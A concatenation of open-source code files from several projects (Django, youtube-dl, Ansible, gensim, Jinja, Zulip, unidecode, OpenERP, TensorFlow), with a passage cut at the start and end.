collection_actions={'detail': 'GET',
'statistics': 'GET'},
member_actions={'uptime': 'GET',
'search': 'GET',
'servers': 'GET'})]
return resources
def get_controller_extensions(self):
return []
| apache-2.0 |
joeyjojo/django_offline | src/django/contrib/flatpages/forms.py | 79 | 1727 | from django import forms
from django.conf import settings
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext, ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/\.~]+$',
help_text = _("Example: '/about/contact/'. Make sure to have leading"
" and trailing slashes."),
error_message = _("This value must contain only letters, numbers,"
" dots, underscores, dashes, slashes or tildes."))
class Meta:
model = FlatPage
def clean_url(self):
url = self.cleaned_data['url']
if not url.startswith('/'):
raise forms.ValidationError(ugettext("URL is missing a leading slash."))
if (settings.APPEND_SLASH and
'django.middleware.common.CommonMiddleware' in settings.MIDDLEWARE_CLASSES and
not url.endswith('/')):
raise forms.ValidationError(ugettext("URL is missing a trailing slash."))
return url
def clean(self):
url = self.cleaned_data.get('url', None)
sites = self.cleaned_data.get('sites', None)
same_url = FlatPage.objects.filter(url=url)
if self.instance.pk:
same_url = same_url.exclude(pk=self.instance.pk)
if same_url.filter(sites__in=sites).exists():
for site in sites:
if same_url.filter(sites=site).exists():
raise forms.ValidationError(
_('Flatpage with url %(url)s already exists for site %(site)s' %
{'url': url, 'site': site}))
return super(FlatpageForm, self).clean()
| mit |
0x7678/youtube-dl | youtube_dl/extractor/infoq.py | 36 | 2115 | from __future__ import unicode_literals
import base64
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
)
class InfoQIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?infoq\.com/[^/]+/(?P<id>[^/]+)$'
_TEST = {
'url': 'http://www.infoq.com/presentations/A-Few-of-My-Favorite-Python-Things',
'md5': 'b5ca0e0a8c1fed93b0e65e48e462f9a2',
'info_dict': {
'id': '12-jan-pythonthings',
'ext': 'mp4',
'description': 'Mike Pirnat presents some tips and tricks, standard libraries and third party packages that make programming in Python a richer experience.',
'title': 'A Few of My Favorite [Python] Things',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_title = self._html_search_regex(r'<title>(.*?)</title>', webpage, 'title')
video_description = self._html_search_meta('description', webpage, 'description')
# The server URL is hardcoded
video_url = 'rtmpe://video.infoq.com/cfx/st/'
# Extract video URL
encoded_id = self._search_regex(
r"jsclassref\s*=\s*'([^']*)'", webpage, 'encoded id')
real_id = compat_urllib_parse.unquote(base64.b64decode(encoded_id.encode('ascii')).decode('utf-8'))
playpath = 'mp4:' + real_id
video_filename = playpath.split('/')[-1]
video_id, extension = video_filename.split('.')
http_base = self._search_regex(
r'EXPRESSINSTALL_SWF\s*=\s*"(https?://[^/"]+/)', webpage,
'HTTP base URL')
formats = [{
'format_id': 'rtmp',
'url': video_url,
'ext': extension,
'play_path': playpath,
}, {
'format_id': 'http',
'url': http_base + real_id,
}]
self._sort_formats(formats)
return {
'id': video_id,
'title': video_title,
'description': video_description,
'formats': formats,
}
| unlicense |
andmos/ansible | lib/ansible/plugins/callback/context_demo.py | 118 | 1793 | # (C) 2012, Michael DeHaan, <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: context_demo
type: aggregate
short_description: demo callback that adds play/task context
description:
- Displays some play and task context along with normal output
- This is mostly for demo purposes
version_added: "2.1"
requirements:
- whitelist in configuration
'''
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
"""
This is a very trivial example of how any callback function can get at play and task objects.
play will be 'None' for runner invocations, and task will be None for 'setup' invocations.
"""
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'aggregate'
CALLBACK_NAME = 'context_demo'
CALLBACK_NEEDS_WHITELIST = True
def __init__(self, *args, **kwargs):
super(CallbackModule, self).__init__(*args, **kwargs)
self.task = None
self.play = None
def v2_on_any(self, *args, **kwargs):
self._display.display("--- play: {0} task: {1} ---".format(getattr(self.play, 'name', None), self.task))
self._display.display(" --- ARGS ")
for i, a in enumerate(args):
self._display.display(' %s: %s' % (i, a))
self._display.display(" --- KWARGS ")
for k in kwargs:
self._display.display(' %s: %s' % (k, kwargs[k]))
def v2_playbook_on_play_start(self, play):
self.play = play
def v2_playbook_on_task_start(self, task, is_conditional):
self.task = task
| gpl-3.0 |
michelts/lettuce | tests/integration/lib/Django-1.3/django/utils/tree.py | 310 | 5778 | """
A class for storing a tree graph. Primarily used for filter constructs in the
ORM.
"""
from django.utils.copycompat import deepcopy
class Node(object):
"""
A single internal node in the tree graph. A Node should be viewed as a
connection (the root) with the children being either leaf nodes or other
Node instances.
"""
# Standard connector type. Clients usually won't use this at all and
# subclasses will usually override the value.
default = 'DEFAULT'
def __init__(self, children=None, connector=None, negated=False):
"""
Constructs a new Node. If no connector is given, the default will be
used.
Warning: You probably don't want to pass in the 'negated' parameter. It
is NOT the same as constructing a node and calling negate() on the
result.
"""
self.children = children and children[:] or []
self.connector = connector or self.default
self.subtree_parents = []
self.negated = negated
# We need this because of django.db.models.query_utils.Q. Q. __init__() is
# problematic, but it is a natural Node subclass in all other respects.
def _new_instance(cls, children=None, connector=None, negated=False):
"""
This is called to create a new instance of this class when we need new
Nodes (or subclasses) in the internal code in this class. Normally, it
just shadows __init__(). However, subclasses with an __init__ signature
that is not an extension of Node.__init__ might need to implement this
method to allow a Node to create a new instance of them (if they have
any extra setting up to do).
"""
obj = Node(children, connector, negated)
obj.__class__ = cls
return obj
_new_instance = classmethod(_new_instance)
def __str__(self):
if self.negated:
return '(NOT (%s: %s))' % (self.connector, ', '.join([str(c) for c
in self.children]))
return '(%s: %s)' % (self.connector, ', '.join([str(c) for c in
self.children]))
def __deepcopy__(self, memodict):
"""
Utility method used by copy.deepcopy().
"""
obj = Node(connector=self.connector, negated=self.negated)
obj.__class__ = self.__class__
obj.children = deepcopy(self.children, memodict)
obj.subtree_parents = deepcopy(self.subtree_parents, memodict)
return obj
def __len__(self):
"""
The size of a node if the number of children it has.
"""
return len(self.children)
def __nonzero__(self):
"""
For truth value testing.
"""
return bool(self.children)
def __contains__(self, other):
"""
Returns True is 'other' is a direct child of this instance.
"""
return other in self.children
def add(self, node, conn_type):
"""
Adds a new node to the tree. If the conn_type is the same as the root's
current connector type, the node is added to the first level.
Otherwise, the whole tree is pushed down one level and a new root
connector is created, connecting the existing tree and the new node.
"""
if node in self.children and conn_type == self.connector:
return
if len(self.children) < 2:
self.connector = conn_type
if self.connector == conn_type:
if isinstance(node, Node) and (node.connector == conn_type or
len(node) == 1):
self.children.extend(node.children)
else:
self.children.append(node)
else:
obj = self._new_instance(self.children, self.connector,
self.negated)
self.connector = conn_type
self.children = [obj, node]
def negate(self):
"""
Negate the sense of the root connector. This reorganises the children
so that the current node has a single child: a negated node containing
all the previous children. This slightly odd construction makes adding
new children behave more intuitively.
Interpreting the meaning of this negate is up to client code. This
method is useful for implementing "not" arrangements.
"""
self.children = [self._new_instance(self.children, self.connector,
not self.negated)]
self.connector = self.default
def start_subtree(self, conn_type):
"""
Sets up internal state so that new nodes are added to a subtree of the
current node. The conn_type specifies how the sub-tree is joined to the
existing children.
"""
if len(self.children) == 1:
self.connector = conn_type
elif self.connector != conn_type:
self.children = [self._new_instance(self.children, self.connector,
self.negated)]
self.connector = conn_type
self.negated = False
self.subtree_parents.append(self.__class__(self.children,
self.connector, self.negated))
self.connector = self.default
self.negated = False
self.children = []
def end_subtree(self):
"""
Closes off the most recently unmatched start_subtree() call.
This puts the current state into a node of the parent tree and returns
the current instances state to be the parent.
"""
obj = self.subtree_parents.pop()
node = self.__class__(self.children, self.connector)
self.connector = obj.connector
self.negated = obj.negated
self.children = obj.children
self.children.append(node)
| gpl-3.0 |
dsquareindia/gensim | gensim/models/coherencemodel.py | 8 | 10693 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Module for calculating topic coherence in python. This is the implementation of
the four stage topic coherence pipeline from the paper [1]_.
The four stage pipeline is basically:
Segmentation -> Probability Estimation -> Confirmation Measure -> Aggregation.
Implementation of this pipeline allows for the user to in essence "make" a
coherence measure of his/her choice by choosing a method in each of the pipelines.
.. [1] Michael Roeder, Andreas Both and Alexander Hinneburg. Exploring the space of topic
coherence measures. http://svn.aksw.org/papers/2015/WSDM_Topic_Evaluation/public.pdf.
"""
import logging
from gensim import interfaces
from gensim.topic_coherence import (segmentation, probability_estimation,
direct_confirmation_measure, indirect_confirmation_measure,
aggregation)
from gensim.matutils import argsort
from gensim.utils import is_corpus, FakeDict
from gensim.models.ldamodel import LdaModel
from gensim.models.wrappers import LdaVowpalWabbit, LdaMallet
import numpy as np
from collections import namedtuple
logger = logging.getLogger(__name__)
boolean_document_based = ['u_mass']
sliding_window_based = ['c_v', 'c_uci', 'c_npmi']
make_pipeline = namedtuple('Coherence_Measure', 'seg, prob, conf, aggr')
coherence_dict = {
'u_mass': make_pipeline(segmentation.s_one_pre,
probability_estimation.p_boolean_document,
direct_confirmation_measure.log_conditional_probability,
aggregation.arithmetic_mean),
'c_v': make_pipeline(segmentation.s_one_set,
probability_estimation.p_boolean_sliding_window,
indirect_confirmation_measure.cosine_similarity,
aggregation.arithmetic_mean),
'c_uci': make_pipeline(segmentation.s_one_one,
probability_estimation.p_boolean_sliding_window,
direct_confirmation_measure.log_ratio_measure,
aggregation.arithmetic_mean),
'c_npmi': make_pipeline(segmentation.s_one_one,
probability_estimation.p_boolean_sliding_window,
direct_confirmation_measure.log_ratio_measure,
aggregation.arithmetic_mean),
}
sliding_windows_dict = {
'c_v': 110,
'c_uci': 10,
'c_npmi': 10
}
class CoherenceModel(interfaces.TransformationABC):
"""
Objects of this class allow for building and maintaining a model for topic
coherence.
The main methods are:
1. constructor, which initializes the four stage pipeline by accepting a coherence measure,
2. the ``get_coherence()`` method, which returns the topic coherence.
One way of using this feature is through providing a trained topic model. A dictionary has to be explicitly
provided if the model does not contain a dictionary already::
cm = CoherenceModel(model=tm, corpus=corpus, coherence='u_mass') # tm is the trained topic model
cm.get_coherence()
Another way of using this feature is through providing tokenized topics such as::
topics = [['human', 'computer', 'system', 'interface'],
['graph', 'minors', 'trees', 'eps']]
cm = CoherenceModel(topics=topics, corpus=corpus, dictionary=dictionary, coherence='u_mass') # note that a dictionary has to be provided.
cm.get_coherence()
Model persistency is achieved via its load/save methods.
"""
def __init__(self, model=None, topics=None, texts=None, corpus=None, dictionary=None, window_size=None, coherence='c_v', topn=10):
"""
Args:
----
model : Pre-trained topic model. Should be provided if topics is not provided.
Currently supports LdaModel, LdaMallet wrapper and LdaVowpalWabbit wrapper. Use 'topics'
parameter to plug in an as yet unsupported model.
topics : List of tokenized topics. If this is preferred over model, dictionary should be provided. eg::
topics = [['human', 'machine', 'computer', 'interface'],
['graph', 'trees', 'binary', 'widths']]
texts : Tokenized texts. Needed for coherence models that use sliding window based probability estimator, eg::
texts = [['system', 'human', 'system', 'eps'],
['user', 'response', 'time'],
['trees'],
['graph', 'trees'],
['graph', 'minors', 'trees'],
['graph', 'minors', 'survey']]
corpus : Gensim document corpus.
dictionary : Gensim dictionary mapping of id word to create corpus. If model.id2word is present, this is not needed.
If both are provided, dictionary will be used.
window_size : Is the size of the window to be used for coherence measures using boolean sliding window as their
probability estimator. For 'u_mass' this doesn't matter.
If left 'None' the default window sizes are used which are:
'c_v' : 110
'c_uci' : 10
'c_npmi' : 10
coherence : Coherence measure to be used. Supported values are:
'u_mass'
'c_v'
'c_uci' also popularly known as c_pmi
'c_npmi'
For 'u_mass' corpus should be provided. If texts is provided, it will be converted to corpus using the dictionary.
For 'c_v', 'c_uci' and 'c_npmi' texts should be provided. Corpus is not needed.
topn : Integer corresponding to the number of top words to be extracted from each topic.
"""
if model is None and topics is None:
raise ValueError("One of model or topics has to be provided.")
elif topics is not None and dictionary is None:
raise ValueError("dictionary has to be provided if topics are to be used.")
if texts is None and corpus is None:
raise ValueError("One of texts or corpus has to be provided.")
# Check if associated dictionary is provided.
if dictionary is None:
if isinstance(model.id2word, FakeDict):
raise ValueError("The associated dictionary should be provided with the corpus or 'id2word' for topic model"
" should be set as the associated dictionary.")
else:
self.dictionary = model.id2word
else:
self.dictionary = dictionary
# Check for correct inputs for u_mass coherence measure.
if coherence in boolean_document_based:
if is_corpus(corpus)[0]:
self.corpus = corpus
elif texts is not None:
self.texts = texts
self.corpus = [self.dictionary.doc2bow(text) for text in self.texts]
else:
raise ValueError("Either 'corpus' with 'dictionary' or 'texts' should be provided for %s coherence." % coherence)
# Check for correct inputs for c_v coherence measure.
elif coherence in sliding_window_based:
self.window_size = window_size
if texts is None:
raise ValueError("'texts' should be provided for %s coherence." % coherence)
else:
self.texts = texts
else:
raise ValueError("%s coherence is not currently supported." % coherence)
self.topn = topn
self.model = model
if model is not None:
self.topics = self._get_topics()
elif topics is not None:
self.topics = []
for topic in topics:
t_i = []
for n, _ in enumerate(topic):
t_i.append(dictionary.token2id[topic[n]])
self.topics.append(np.array(t_i))
self.coherence = coherence
def __str__(self):
return coherence_dict[self.coherence].__str__()
def _get_topics(self):
"""Internal helper function to return topics from a trained topic model."""
topics = []
if isinstance(self.model, LdaModel):
for topic in self.model.state.get_lambda():
bestn = argsort(topic, topn=self.topn, reverse=True)
topics.append(bestn)
elif isinstance(self.model, LdaVowpalWabbit):
for topic in self.model._get_topics():
bestn = argsort(topic, topn=self.topn, reverse=True)
topics.append(bestn)
elif isinstance(self.model, LdaMallet):
for topic in self.model.word_topics:
bestn = argsort(topic, topn=self.topn, reverse=True)
topics.append(bestn)
else:
raise ValueError("This topic model is not currently supported. Supported topic models are"
"LdaModel, LdaVowpalWabbit and LdaMallet.")
return topics
def get_coherence(self):
"""
Return coherence value based on pipeline parameters.
"""
measure = coherence_dict[self.coherence]
segmented_topics = measure.seg(self.topics)
if self.coherence in boolean_document_based:
per_topic_postings, num_docs = measure.prob(self.corpus, segmented_topics)
confirmed_measures = measure.conf(segmented_topics, per_topic_postings, num_docs)
elif self.coherence in sliding_window_based:
if self.window_size is not None:
self.window_size = sliding_windows_dict[self.coherence]
per_topic_postings, num_windows = measure.prob(texts=self.texts, segmented_topics=segmented_topics,
dictionary=self.dictionary, window_size=self.window_size)
if self.coherence == 'c_v':
confirmed_measures = measure.conf(self.topics, segmented_topics, per_topic_postings, 'nlr', 1, num_windows)
else:
if self.coherence == 'c_npmi':
normalize = True
else:
# For c_uci
normalize = False
confirmed_measures = measure.conf(segmented_topics, per_topic_postings, num_windows, normalize=normalize)
return measure.aggr(confirmed_measures)
| lgpl-2.1 |
evanma92/routeh | flask/lib/python2.7/site-packages/jinja2/constants.py | 1169 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| bsd-3-clause |
jphilipsen05/zulip | zerver/management/commands/change_user_email.py | 41 | 1146 | from __future__ import absolute_import
from __future__ import print_function
from typing import Any
from argparse import ArgumentParser
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_change_user_email
from zerver.models import UserProfile, get_user_profile_by_email
class Command(BaseCommand):
help = """Change the email address for a user."""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('old_email', metavar='<old email>', type=str,
help='email address to change')
parser.add_argument('new_email', metavar='<new email>', type=str,
help='new email address')
def handle(self, *args, **options):
# type: (*Any, **str) -> None
old_email = options['old_email']
new_email = options['new_email']
try:
user_profile = get_user_profile_by_email(old_email)
except UserProfile.DoesNotExist:
print("Old e-mail doesn't exist in the system.")
exit(1)
do_change_user_email(user_profile, new_email)
| apache-2.0 |
didzis/CAMR | stanfordnlp/unidecode/x0ca.py | 253 | 5007 | data = (
'jjael', # 0x00
'jjaelg', # 0x01
'jjaelm', # 0x02
'jjaelb', # 0x03
'jjaels', # 0x04
'jjaelt', # 0x05
'jjaelp', # 0x06
'jjaelh', # 0x07
'jjaem', # 0x08
'jjaeb', # 0x09
'jjaebs', # 0x0a
'jjaes', # 0x0b
'jjaess', # 0x0c
'jjaeng', # 0x0d
'jjaej', # 0x0e
'jjaec', # 0x0f
'jjaek', # 0x10
'jjaet', # 0x11
'jjaep', # 0x12
'jjaeh', # 0x13
'jjya', # 0x14
'jjyag', # 0x15
'jjyagg', # 0x16
'jjyags', # 0x17
'jjyan', # 0x18
'jjyanj', # 0x19
'jjyanh', # 0x1a
'jjyad', # 0x1b
'jjyal', # 0x1c
'jjyalg', # 0x1d
'jjyalm', # 0x1e
'jjyalb', # 0x1f
'jjyals', # 0x20
'jjyalt', # 0x21
'jjyalp', # 0x22
'jjyalh', # 0x23
'jjyam', # 0x24
'jjyab', # 0x25
'jjyabs', # 0x26
'jjyas', # 0x27
'jjyass', # 0x28
'jjyang', # 0x29
'jjyaj', # 0x2a
'jjyac', # 0x2b
'jjyak', # 0x2c
'jjyat', # 0x2d
'jjyap', # 0x2e
'jjyah', # 0x2f
'jjyae', # 0x30
'jjyaeg', # 0x31
'jjyaegg', # 0x32
'jjyaegs', # 0x33
'jjyaen', # 0x34
'jjyaenj', # 0x35
'jjyaenh', # 0x36
'jjyaed', # 0x37
'jjyael', # 0x38
'jjyaelg', # 0x39
'jjyaelm', # 0x3a
'jjyaelb', # 0x3b
'jjyaels', # 0x3c
'jjyaelt', # 0x3d
'jjyaelp', # 0x3e
'jjyaelh', # 0x3f
'jjyaem', # 0x40
'jjyaeb', # 0x41
'jjyaebs', # 0x42
'jjyaes', # 0x43
'jjyaess', # 0x44
'jjyaeng', # 0x45
'jjyaej', # 0x46
'jjyaec', # 0x47
'jjyaek', # 0x48
'jjyaet', # 0x49
'jjyaep', # 0x4a
'jjyaeh', # 0x4b
'jjeo', # 0x4c
'jjeog', # 0x4d
'jjeogg', # 0x4e
'jjeogs', # 0x4f
'jjeon', # 0x50
'jjeonj', # 0x51
'jjeonh', # 0x52
'jjeod', # 0x53
'jjeol', # 0x54
'jjeolg', # 0x55
'jjeolm', # 0x56
'jjeolb', # 0x57
'jjeols', # 0x58
'jjeolt', # 0x59
'jjeolp', # 0x5a
'jjeolh', # 0x5b
'jjeom', # 0x5c
'jjeob', # 0x5d
'jjeobs', # 0x5e
'jjeos', # 0x5f
'jjeoss', # 0x60
'jjeong', # 0x61
'jjeoj', # 0x62
'jjeoc', # 0x63
'jjeok', # 0x64
'jjeot', # 0x65
'jjeop', # 0x66
'jjeoh', # 0x67
'jje', # 0x68
'jjeg', # 0x69
'jjegg', # 0x6a
'jjegs', # 0x6b
'jjen', # 0x6c
'jjenj', # 0x6d
'jjenh', # 0x6e
'jjed', # 0x6f
'jjel', # 0x70
'jjelg', # 0x71
'jjelm', # 0x72
'jjelb', # 0x73
'jjels', # 0x74
'jjelt', # 0x75
'jjelp', # 0x76
'jjelh', # 0x77
'jjem', # 0x78
'jjeb', # 0x79
'jjebs', # 0x7a
'jjes', # 0x7b
'jjess', # 0x7c
'jjeng', # 0x7d
'jjej', # 0x7e
'jjec', # 0x7f
'jjek', # 0x80
'jjet', # 0x81
'jjep', # 0x82
'jjeh', # 0x83
'jjyeo', # 0x84
'jjyeog', # 0x85
'jjyeogg', # 0x86
'jjyeogs', # 0x87
'jjyeon', # 0x88
'jjyeonj', # 0x89
'jjyeonh', # 0x8a
'jjyeod', # 0x8b
'jjyeol', # 0x8c
'jjyeolg', # 0x8d
'jjyeolm', # 0x8e
'jjyeolb', # 0x8f
'jjyeols', # 0x90
'jjyeolt', # 0x91
'jjyeolp', # 0x92
'jjyeolh', # 0x93
'jjyeom', # 0x94
'jjyeob', # 0x95
'jjyeobs', # 0x96
'jjyeos', # 0x97
'jjyeoss', # 0x98
'jjyeong', # 0x99
'jjyeoj', # 0x9a
'jjyeoc', # 0x9b
'jjyeok', # 0x9c
'jjyeot', # 0x9d
'jjyeop', # 0x9e
'jjyeoh', # 0x9f
'jjye', # 0xa0
'jjyeg', # 0xa1
'jjyegg', # 0xa2
'jjyegs', # 0xa3
'jjyen', # 0xa4
'jjyenj', # 0xa5
'jjyenh', # 0xa6
'jjyed', # 0xa7
'jjyel', # 0xa8
'jjyelg', # 0xa9
'jjyelm', # 0xaa
'jjyelb', # 0xab
'jjyels', # 0xac
'jjyelt', # 0xad
'jjyelp', # 0xae
'jjyelh', # 0xaf
'jjyem', # 0xb0
'jjyeb', # 0xb1
'jjyebs', # 0xb2
'jjyes', # 0xb3
'jjyess', # 0xb4
'jjyeng', # 0xb5
'jjyej', # 0xb6
'jjyec', # 0xb7
'jjyek', # 0xb8
'jjyet', # 0xb9
'jjyep', # 0xba
'jjyeh', # 0xbb
'jjo', # 0xbc
'jjog', # 0xbd
'jjogg', # 0xbe
'jjogs', # 0xbf
'jjon', # 0xc0
'jjonj', # 0xc1
'jjonh', # 0xc2
'jjod', # 0xc3
'jjol', # 0xc4
'jjolg', # 0xc5
'jjolm', # 0xc6
'jjolb', # 0xc7
'jjols', # 0xc8
'jjolt', # 0xc9
'jjolp', # 0xca
'jjolh', # 0xcb
'jjom', # 0xcc
'jjob', # 0xcd
'jjobs', # 0xce
'jjos', # 0xcf
'jjoss', # 0xd0
'jjong', # 0xd1
'jjoj', # 0xd2
'jjoc', # 0xd3
'jjok', # 0xd4
'jjot', # 0xd5
'jjop', # 0xd6
'jjoh', # 0xd7
'jjwa', # 0xd8
'jjwag', # 0xd9
'jjwagg', # 0xda
'jjwags', # 0xdb
'jjwan', # 0xdc
'jjwanj', # 0xdd
'jjwanh', # 0xde
'jjwad', # 0xdf
'jjwal', # 0xe0
'jjwalg', # 0xe1
'jjwalm', # 0xe2
'jjwalb', # 0xe3
'jjwals', # 0xe4
'jjwalt', # 0xe5
'jjwalp', # 0xe6
'jjwalh', # 0xe7
'jjwam', # 0xe8
'jjwab', # 0xe9
'jjwabs', # 0xea
'jjwas', # 0xeb
'jjwass', # 0xec
'jjwang', # 0xed
'jjwaj', # 0xee
'jjwac', # 0xef
'jjwak', # 0xf0
'jjwat', # 0xf1
'jjwap', # 0xf2
'jjwah', # 0xf3
'jjwae', # 0xf4
'jjwaeg', # 0xf5
'jjwaegg', # 0xf6
'jjwaegs', # 0xf7
'jjwaen', # 0xf8
'jjwaenj', # 0xf9
'jjwaenh', # 0xfa
'jjwaed', # 0xfb
'jjwael', # 0xfc
'jjwaelg', # 0xfd
'jjwaelm', # 0xfe
'jjwaelb', # 0xff
)
| gpl-2.0 |
ritchyteam/odoo | addons/account_payment/wizard/__init__.py | 436 | 1144 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_payment_order
import account_payment_populate_statement
import account_payment_pay
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
apocalypsebg/odoo | addons/base_report_designer/plugin/openerp_report_designer/bin/script/NewReport.py | 384 | 3903 | #########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from lib.error import ErrorDialog
from lib.functions import *
from lib.logreport import *
from LoginTest import *
from lib.rpc import *
database="test"
uid = 3
#
#
#
# Start OpenOffice.org, listen for connections and open testing document
#
#
class NewReport(unohelper.Base, XJobExecutor):
def __init__(self, ctx):
self.ctx = ctx
self.module = "openerp_report"
self.version = "0.1"
LoginTest()
self.logobj=Logger()
if not loginstatus and __name__=="package":
exit(1)
self.win=DBModalDialog(60, 50, 180, 115, "Open New Report")
self.win.addFixedText("lblModuleSelection", 2, 2, 60, 15, "Module Selection")
self.win.addComboListBox("lstModule", -2,13,176,80 , False)
self.lstModule = self.win.getControl( "lstModule" )
self.aModuleName=[]
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
global passwd
self.password = passwd
global url
self.sock=RPCSession(url)
ids = self.sock.execute(database, uid, self.password, 'ir.model' , 'search',[])
fields = [ 'model','name']
res = self.sock.execute(database, uid, self.password, 'ir.model' , 'read', ids, fields)
res.sort(lambda x, y: cmp(x['name'],y['name']))
for i in range(len(res)):
self.lstModule.addItem(res[i]['name'],self.lstModule.getItemCount())
self.aModuleName.append(res[i]['model'])
self.win.addButton('btnOK',-2 ,-5, 70,15,'Use Module in Report' ,actionListenerProc = self.btnOk_clicked )
self.win.addButton('btnCancel',-2 - 70 - 5 ,-5, 35,15,'Cancel' ,actionListenerProc = self.btnCancel_clicked )
self.win.doModalDialog("",None)
def btnOk_clicked(self, oActionEvent):
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
docinfo.setUserFieldValue(3,self.aModuleName[self.lstModule.getSelectedItemPos()])
self.logobj.log_write('Module Name',LOG_INFO, ':Module use in creating a report %s using database %s' % (self.aModuleName[self.lstModule.getSelectedItemPos()], database))
self.win.endExecute()
def btnCancel_clicked(self, oActionEvent):
self.win.endExecute()
if __name__<>"package" and __name__=="__main__":
NewReport(None)
elif __name__=="package":
g_ImplementationHelper.addImplementation( \
NewReport,
"org.openoffice.openerp.report.opennewreport",
("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mixturemodel-flow/tensorflow | tensorflow/contrib/training/python/training/sampling_ops_threading_test.py | 129 | 2884 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.training.python.training import sampling_ops
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
class SamplingOpsThreadingTest(test.TestCase):
def testMultiThreadedEstimateDataDistribution(self):
num_classes = 10
# Set up graph.
random_seed.set_random_seed(1234)
label = math_ops.cast(
math_ops.round(random_ops.random_uniform([1]) * num_classes),
dtypes_lib.int32)
prob_estimate = sampling_ops._estimate_data_distribution( # pylint: disable=protected-access
label, num_classes)
# Check that prob_estimate is well-behaved in a multithreaded context.
_, _, [prob_estimate] = sampling_ops._verify_input( # pylint: disable=protected-access
[], label, [prob_estimate])
# Use queues to run multiple threads over the graph, each of which
# fetches `prob_estimate`.
queue = data_flow_ops.FIFOQueue(
capacity=25,
dtypes=[prob_estimate.dtype],
shapes=[prob_estimate.get_shape()])
